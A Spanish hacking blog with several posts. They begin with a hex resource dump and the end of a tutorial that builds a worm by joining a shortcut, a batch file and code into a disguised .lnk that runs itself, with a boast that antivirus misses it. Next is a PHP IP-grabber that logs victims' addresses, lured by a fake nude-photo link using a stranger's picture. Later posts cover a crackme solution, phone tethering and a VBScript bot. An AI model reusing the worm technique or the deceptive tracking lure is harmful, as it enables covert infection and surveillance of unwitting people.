0000000000002C430000E8020000B0040000000000000000000000000000280234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE000001000000010000000000000001000000000000000000000000000400000001000000000000000000000000000000440000000000560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000A0CB00488010000010053007400720069006E006700460069006C00650049006E0066006F00000064010000010030004300300041003000340042003000000044002200010043006F006D00700061006E0079004E0061006D006500000000004100670065006E00630069006100200043007200610063006B0069006E00670000000000340014000100500072006F0064007500630074004E0061006D00650000000000500072006F0079006500630074006F00310000002C000A000100460069006C006500560065007200730069006F006E000000000031002E00300030000000000030000A000100500072006F006400750063007400560065007200730069006F006E00000031002E00300030000000000034001200010049006E007400650072006E0061006C004E0061006D00650000004B0065007900470065006E006D0065000000000044001A0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000004B0065007900470065006E006D0065002E00650078006500000000000000010001002040000001000400E802000031752800000020000000400000000100040000000000800200000000000000000000000000000000000000000000000080000080000000808000800000008000800080800000C0C0C000808080000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0000FFFFFF00FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FF9FFF999FF99FF9FF9F9F9FF9FF9FFF9F9FF9FF9F9FF9F9FF9F9F9FF9F9FFFF9F9FF9FF9F9FFFF9F9FF9F9FF9F9FFFFFF9FFF999F9FFFF99FFF9F9FF9F9FFFFFF99FFFF9F9FF9F9F9FF9F99F9F9FFFF9F9F9999FFF99FF9FF9F9F9F9FFF9FFF9FFFFFFFFFFFFFF9FFFFFFFFFFFFF999FFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFF999FFFFFFFFFFFFFFFFFFFFF9FFF9FF9FFFFFFFFFFFFFFFFFFFFFFFF9FFFF9F9999FFFFFFFFFFFFFFFFFFFFF9FFFF9F9FF9FFFFFFFFFFFFFFFFFFFFF9FFFF9FF99FFFFFFFFFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFF999F999F9999FF999FF999F999F9999FF9FFF9FF9FFFF9FFFF9FFFFF9F9FF9FFF99999FFF99FF9999F9FFFFF9FF999FFFF9F9FFF9FF9F9FF9F9FF9FF9FFFF9FFFF9F9FFFF9999F99FFF999F99FF99FFFFF9F9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFF9FFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
ahora nos ase falta el acceso directo el cuan anterior mente llamamos "6.lnk" y contendrá lo mismo en el campo destino

C:\Windows\System32\cmd.exe /c type w.lnk> worm.bat&worm.bat

ahora ya para terminar pasaremos a juntarlos con el simbolo del sistema y teclearemos esto


copy /b 6.lnk+comandos.bat+code.txt w.lnk


como resultado nos creara el archivo "w.lnk" el cual si ejecutamos %&$+#01(*%$  ya saben lo que pasa jajajajaja

Saludos Flamer y hay esta el tutorial que prometí ase muchos años

Nota: y si le pasan el virustotal verán que ninguno lo detecta hasta ahora

lunes, 20 de febrero de 2017

Sacar IP De Una Persona Mandando Un Enlace

Hoy veremos como averiguar la IP de una persona mandando solo un enlace, por Internet e visto paginas que ofrecen este servicio pero aquí veremos como lo hacen y pues claro yo lo haré de una manera muy simple empecemos.

Primeramente yo lo haré en mi localhost y después mostrare como subirlo a un servidor gratuito como es 000webhost

Para este ejemplo yo elegí una foto de una chica para hacer el ejemplo, aclaro no la conozco y solo fue una foto que elegí de Internet con el buscador de google y perdón si la llega a ver algún día y espero que entienda que solo use la imagen para una demostración.

Bueno en el directorio raíz de mi localhost pondré la imagen con el nombre "mifotodesnuda..jpg" 
observen que tiene dos puntitos al final OJO ya que eso es para engañar ala victima pero ustedes pueden poner otras trampas mejores que las mías seguimos.

Después crearemos una carpeta en el directoria raíz en el localhost llamada "mifotodesnuda.jpg" pero con un solo punto OJO

Y ya que tengamos la carpeta y la imagen en el directorio raíz, crearemos el archivo "index.php" dentro de la carpeta que hicimos anteriormente así


  
El código de el archivo "index.php" es el siguiente:

<html>
<head><title></title>
</head>
<body>
<?php
$hora = date("Y/m/d  H:i:s A");  
$ip = $_SERVER['REMOTE_ADDR'];

$file=fopen('IP_victima.txt','a');
fwrite($file,"========================================================================================================\r\n\r\n");
fwrite($file,$hora . "\r\n\r\n");
fwrite($file,"La IP Desde donde hiso clic es= " . $ip . "\r\n");
fwrite($file,"========================================================================================================\r\n\r\n");
fclose($file);

header("Location:http://localhost/mifotodesnuda..jpg");
?>
</body>
</html>


Ya que tengamos hecho el código lo aguardamos y pasaremos a ejecutarlo, para eso yo pondré esta dirección en mi navegador

http://localhost/mifotodesnuda.jpg

Y al ejecutarla me a párese la imagen de la chica


Y me voy ala carpeta "mifotodesnuda.jpg" y observo que se creo el archivo "IP_victima.txt"



Al abrirlo me encuentro con este contenido

=========================================================================

2017/02/20  18:31:56 PM

La IP Desde donde hiso clic es= ::1
=========================================================================
    
Si observan verán que no me muestra la ip solo me muestra el numero 1 y eso es por que lo estoy ejecutando en modo local, así que para eso subiré los archivos a un servidor gratuito como es: https://www.000webhost.com

Nota: si no tienen cuenta se tendrán que registrar, pero también pueden usar otro servidores gratuitos si los tienen, no necesaria mente tiene que ser en 000webhost.

Ya adentro seleccionaremos File Manager este



NOTA: si les a párese un formulario de logueo cierren y vuelvan a presionar File Manager, esto es un error que me a párese continuamente ami

Después nos iremos al directorio public_HTML que es el directorio raíz


Ya que estemos aquí adentro subiremos la imagen primero presionando el botón Upload



Luego seleccionamos el archivo a subir que es la imagen de la chica dando clic aquí



Y ya que seleccionamos la imagen a subir presionamos la palomita siguiente



La presionamos 2 beses hasta que salga Checking files así


Y para regresar nos presionamos la flecha azul y ya que nos encontramos en el directorio raíz de nuevo observaran que se subió la imagen


Después crearemos la carpeta llamada "mifotodesnuda.jpg" para eso daremos clic en New Dir



Y en el siguiente formulario ponemos el nombre de la carpeta



Para finalizar la creación de la carpeta daremos clic en la palomita verde y nos dice que el directorio se creo correcta mente




Y para devolvernos damos clic en la flecha azul y ya que estamos en el directorio raíz observamos que se creo la carpeta


Así que daremos doble clic sobre ella y ya adentro de ella subiremos el archivo "index.php", pero antes de eso cambiare la linea del código donde dice localhost por este

header("Location:http://practicashacking.net23.net/mifotodesnuda..jpg");

Nota: no mostrare como subir el archivo "index.php" ya que creo que ya saben como subir los archivos ya que se haría el tutorial mas largo seguimos.

Ya que hallamos subido el archivo nos que daría el directorio algo así


Y para ver la pagina en acción solo damos clic derecho en open y en abrir en otra pestaña así


Le doy abrir en otra pestaña para no perder donde estamos y a continuación en la pestaña nueva veremos la imagen de la chica, esto quiere decir que todo funciono bien  jajjajaja

Así que damos clic en UP y de nuevo ingresamos ala carpeta "mifotodesnuda.jpg" ya que no puedo refrescar la pagina y veremos que se creo el archivo "IP_victima.txt"



Para abrirlo daremos clic en Edit


Y nos muestra el contenido del archivo "IP_victima.txt" que contiene esto


Yo censure mi IP por seguridad, así que ya saben como sacar la IP de una persona y como funcionan estas paginas que facilitan todo este trabajo que hicimos

Bueno saludos Flamer y eso es todo espero les halla gustado


sábado, 18 de febrero de 2017

Resolviendo El Crackme 2 De EnigmaGroup

Anterior mente había expuesto la solución del crackme 1 de EnigmaGroup aquí el tema:
http://elblogdeflamer.blogspot.mx/2017/01/resolviendo-el-crackme1-de-enigmagroup.html

Pues ahora les traigo la solución del crackme 2, el cual pueden descargar desde esta pagina:
https://www.enigmagroup.org/pages/cracking

Ahora bien ya que lo hallamos descargado, lo abriremos con el ollydbg

Nota: ya le pase el RGD Detector y observe que no tiene ninguna protección así que no tiene caso explicar ese punto y hacer el tutorial mas largo, así que volviendo al tema el ollydbg me muestra el siguiente desensamblado



Luego presionaremos F9 para ver si se ejecuta bien y no tiene alguna protección antidebuger y nos muestra esta pantalla


Y lo que observo es que al pasar el puntero del mouse por el botón Submit este se des habilita y al pasar el puntero del mouse sobre el botón de cancel se habilita de nuevo, pero meda igual eso solo es una observación ya que tengo que habilitarlo con la api EnableWindow de todos modos

Bueno ya que tenemos el programa corriendo, nos iremos al commandbar y teclearemos lo siguiente
bp EnableWindow  así



Y presionamos enter y al poner el puntero del mouse sobre cancel se detiene aquí

Es la api que le pusimos el breakpoint, bueno para salir de aquí hay 2 formas, la primera es presionando puro F8 hasta llegar al desensamblado del crackme y la otra es presionar Control+F9 y al llegar a un RETN presionar F8 y de nuevo presionamos Control+F9 y al llegar a un RETN presionamos F8 y así sucesivamente ya que si nos vamos solo presionando Control+F9 se puede dar el caso de que se pasen y no lleguen a donde queremos.

Así que presionaremos Control+F9 y al llegar a un RETN presionaremos F8 y llegaremos hasta la dirección 004038F9 que es esta


Si observan una linea arriba esta el call que habilita el botón submit y unas lineas mas arriba esta el PUSH -1 el cual es el que ingresa el valor -1 ala pila para que sea trabajado en el call y es el que causa que el botón sea habilitado.

Ahora presionaremos F9 y pasaremos el puntero del mouse sobre el botón submit y se detendrá justo en la api EnableWindow y para salir de esa zona aplicaremos el mismo método Control+F9 y cuando lleguen a un RETN presionan F8 hasta llegar ala dirección 004036D8


Y si observan un poco los registros verán que el registro EBX es igual a 1 y el registro EDI es igual a cero



Así que remplazaremos el PUSH EDI  por  PUSH EBX y que daría así



Y si presionan F9 verán que ya no se des habilita el botón submit, así que aguardaremos los cambios dando clic derecho y elijen la siguiente opción


Y damos clic a  copy all


Y cerramos la venta que aparece y a continuación presionamos si al cuadro de texto siguiente así




Y enseguida nos saldrá el cuadro de guardar como y lo aguardaremos con el nombre de "App2_crack.exe", ya solo nos toca averiguar la contraseña, así que abriremos el nuevo archivo con el ollydbg y buscaremos las string así


Y si buscan un poco encontraran la frase "Congratulations! The password is " que es la que buscamos así que le daremos doble clic


Y nos manda hasta la linea 00403274 y mas arriba en la linea 00403209 se encuentra la api vbaVarTstEq



Esta api es la encargada de comparar dos cadenas así que le pondremos un breakpoint con F2 y ahora pasaremos a ejecutarlo con F9 y pondré como serial "123456" y presiono el botón submit.


Y como ven se detuvo donde pusimos el breakpoint, y si observan la pila verán que se repite mucho la palabras "TopGun"



Así que ase suponer que la clave es "TopGun" pero si quieren estar mas seguros, que es lo que compara la api vbaVarTstEq trasearemos con F7 hasta que se muestre esto en la pila


Y como verán esa es la clave "TopGun", así que la ingresamos y presionamos el botón submit y nos muestra lo siguiente



bueno creo que eso es todo Saludos Flamer y una cosa no haré los tutoriales del crackme 3 y 4 ya que se resuelven igual que el primero, me pasare hasta el quinto crackme ya que ese si es diferente


jueves, 16 de febrero de 2017

Usar mi Celular Como Router Wifi

Hoy veremos como compartir nuestro Internet con nuestro móvil android, yo en este caso usare mi celular el cual es un modelo Sony Xperia.

Primeramente nos iremos a las configuraciones del celular aquí


Después de esto se desplegara un menú donde presionaremos en la pestaña Mas aquí



Ahora en el siguiente menu daremos clic en Vinculación y Zona Wifi



En el siguiente menú pasaremos a configurar el nombre de nuestra red wifi o el ssid de red y la contraseña para eso daremos clic en 



Si observan en la imagen dice flamer_movil eso es por que yo ya tengo una red, pero a ustedes si no tienen no les aparecerá, bueno seguimos luego pasaremos a darle el nombre a la red y la contraseña así


Aclaro: ustedes pueden darle el nombre que quieran y la contraseña que gusten, yo le puede Flamer_Movil para el ejemplo.

Por ultimo daremos clic en aguardar y  para activar la red palomeamos la siguiente opción


Y verán que en la esquina superior izquierda aparecerá un icono como ondas de wifi, esto quiere decir que nuestro celular ya esta funcionando como router y para ver si es cierto buscaremos redes wifi en nuestra computadora y me aparece esto


Y para poder acceder a ella tienen que ingresar la contraseña que pusieron.

Una cosa muy importante: esto no es Internet gratis ya que mi teléfono depende el Internet de mi router de megacable, esto solo sirve para ampliar el rango es como un repetidor


bueno saludos Flamer y espero que les halla gustado


sábado, 4 de febrero de 2017

Usando Bot's o Automatizadores

En esta ocasión tocare el tema de los bot's o automatizadores pero primero tratare de explicar con mis propias palabras que es un bot y dirán suena a robot pues les cuento que si es un robot pero no como terminator el de la película ese es muy avanzado, seles denomina bot por que hacen trabajos automáticos en un ordenador sin la necesidad del humano y a diferencia de terminator estos bot son limitados ya que solo saben repetir y repetir el mismo trabajo una y otra ves y si cambia el panorama suelen ocurrir errores, a estos programas también se les conocen como automatizadores.

Para este tema usaremos un automatizador llamado tinytask el cual es gratuito y portable, lo podrán descargar desde aqui:http://www.vtaskstudio.com/support.php




Lo que hace este programa es grabar los movimientos del ratón y del teclado para después repetirlos las beses que sean necesarias.

para empezar a grabar presionaremos el botón azul este


Y verán que cambia a rojo y para detener la grabación vuelven a presionar el mismo botón.

Ahora si quieren repetir la grabación solo presionan el botón verde este


pero en algunos casos tenemos la necesidad de repetir la grabación x veces o infinitas veces, para eso presionamos el siguiente botón


y se desplegara el siguiente menú donde podrán elegir el numero de veces a repetir


las demás funciones no las explico ya que no las uso pero no quiere decir que no se ya que las primeras dos tienen que ver con la velocidad de reproducion, yo siempre me quedo con la normal y las que siguen son las que acabo de explicar anteriormente, después tenemos a  las opciones para cambiar las teclas de gravado y por ultimo tenemos la ayuda, el sitio web y el about

Retomando el tema para  aguardar la grabaciones tenemos la siguiente opción



Donde creara un archivo ".Rec" el cual podrán volver a reproducir con tinytask abriéndolo con el icono de la carpetita

Y por ultimo viene la opción de compilar la grabación que es esta


Esta opción crea una grabación independiente de tinytask o sea que no es necesario tener que usar tinytask, solo bastara ejecutar el exe,lo malo es que solo se repite una ves al ejecutar el exe.

Nota: los bot's pueden programarse en cualquier lenguaje hasta en un script o macros, yo solo expuse un programa que nos facilita el trabajo

Bueno ahora viene lo bueno crear nuestro bot, como no puedo poner vídeos en mi blog y tampoco quiero subir un vídeo donde no creo que se entienda bien, así que mejor les dejo un bot ya hecho

El primero es uno compilado en tinytask lo pueden descargar desde aquí: Descargar

Y el segundo es uno hecho en vbscript, aclaro este bot es algo diferente y lo hice que hablara cosa que normal mente eso no hacen los bot, pero lo hice así por diversión, aquí el código


option explicit

dim fso,shell,lucy,r,n,path,msg,f

set shell = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")
Set lucy = CreateObject("sapi.spvoice") 

path = shell.SpecialFolders("Desktop") 
lucy.rate = -1

if fso.fileexists(path & "\lucy.dat") then
   set f = fso.opentextfile(path & "\lucy.dat")
   n = f.readall()
   f.close
   
   msg = "Hola " & n & " como estas,quieres que trabajemos juntos hoy"
   r = inicio(msg)
   if r = 6 then
      lucy.speak "pues bueno empesemos a trabajar" 
      trabajar
   elseif r = 2 then
      lucy.speak "bueno adios me voy con mis amigas adar la vuelta y sera para la proxima"       
   end if
else
   n = ""
   while n = ""
      lucy.Speak "Hola humano soy lucy, cual es tu nombre por favor, escribe tu nombre en el cuadro siguiente por favor."
      n = inputbox("Ingresa Tu Nombre")
   if n = "" then
     lucy.speak "no ingresastes nada, asi que te vuelvo a repetir la pregunta"
   end if
   wend
   
   set f = fso.createtextfile(path & "\lucy.dat")
   f.write(n)
   f.close

   lucy.speak "ooo te llamas " & n & ", mucho gusto en conoserte" & n 
   msg = "ahora trabajaremos juntos" & n & ",quieres que trabajemos juntos hoy"
   
   r = inicio(msg)
   
   if r = 6 then
      lucy.speak "Como es tu primera ves te dare una breve explicacion de quien soy yo. bueno aqui voy. yo soy un simple programa llamado lucy y fui creado por un humano apodado lanzallamas, el cual es un programador, el fue mi creador y mis conocimientos son limitados, asi que no abuses de mis capasidades y no me conpares con terminator, el de la pelicula jajaja, bueno dejemosnos de tonteras y mejor le sigo con el tema, yo solo sirvo para desirte el numero de usuarios conectados actuales en el foro el hacker.net, pues bueno, espero que hallas entendido " & n & " ya que solo te dire esto una ves, empesemos."
   trabajar
   elseif r = 2 then
      lucy.speak "bueno adios me voy con mis amigas adar la vuelta y sera para la proxima"       
   end if
   
end if


function trabajar
   dim http,datos,n,s
   set http = createobject("Microsoft.XmlHttp")
   s = 6
   
   lucy.speak "te estare dando un informe cada 30 minutos de cuantos conectado hay"
   while s = 6
      http.open "get","https://foro.elhacker.net/index.php",false
      http.send
      datos = http.responseText
      
   n = instrrev(datos,"Visitantes") - 5
      
   datos = mid(datos,n,30)
      datos = replace(datos,">","")
      datos = replace(datos,"</","")
      
   lucy.speak "ahorita hay " & datos & "conectados. ahora dime si quieres otro informe en 30 minutos"
      
   s = msgbox ("Selecciona una opcion",3,"")
      if s = 6 then
         for x = 1 to  1800
      wscript.sleep 1000
   next
      end if    
   wend
 lucy.speak "bueno adios y hasta la vista beibi"  
end function
function inicio(msg)
      
   dim op
   
   lucy.speak msg
   op = msgbox ("Selecciona una opcion",3,"")
   
   If op = 6 then
     inicio = 6
   elseif op = 2 or op = 7 then
  inicio = 2
   end if
   
end function



Bueno saludos Flamer y espero les halla gustado